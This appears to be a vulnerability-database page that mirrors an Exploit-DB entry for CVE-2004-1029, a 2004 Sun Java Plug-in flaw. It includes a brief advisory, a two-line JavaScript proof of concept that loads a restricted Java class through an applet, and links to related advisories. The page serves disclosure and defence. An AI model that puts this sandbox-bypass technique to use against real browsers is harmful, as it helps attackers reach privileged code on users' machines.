Lucene search
Jouko PynnonenEDB-ID:24763HistoryNov 22, 2004 - 12:00 a.m.
Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass
2004-11-2200:00:00
Jouko Pynnonen
www.exploit-db.com
15
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/11726/info
A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code to exploit this vulnerability to load a dangerous Java class and to pass this class to an invoked applet.
[script language=javascript]
var c=document.applets[0].getClass().forName('sun.text.Utility');
alert('got Class object: '+c)
[/script]Related
cvelist
cvelist
CVE-2004-1029
2004-11-24 05:00:00
nessus
nessus
FreeBSD : jdk/jre -- Security Vulnerability With Java Plugin (81)
2004-11-30 00:00:00
GLSA-200411-38 : Sun and Blackdown Java: Applet privilege escalation
2004-11-30 00:00:00
Sun Java JRE Plug-in Capability Arbitrary Package Access (Unix)
2013-02-22 00:00:00
freebsd
freebsd
jdk/jre -- Security Vulnerability With Java Plugin
2004-11-24 00:00:00
openvas
openvas
FreeBSD Ports: jdk
2008-09-04 00:00:00
HP-UX Update for Java Plug-In (JPI) HPSBUX01100
2009-05-05 00:00:00
FreeBSD Ports: jdk
2008-09-04 00:00:00
securityvulns
securityvulns
cert
cert
Sun Java Plug-in fails to restrict access to private Java packages
2004-11-23 00:00:00
gentoo
gentoo
Sun and Blackdown Java: Applet privilege escalation
2004-11-29 00:00:00
nvd
nvd
CVE-2004-1029
2005-03-01 05:00:00
cve
cve
CVE-2004-1029
2005-03-01 05:00:00
checkpoint_advisories
checkpoint_advisories
Sun Java Plug-in Sandbox Security Bypass (CVE-2004-1029)
2009-11-30 00:00:00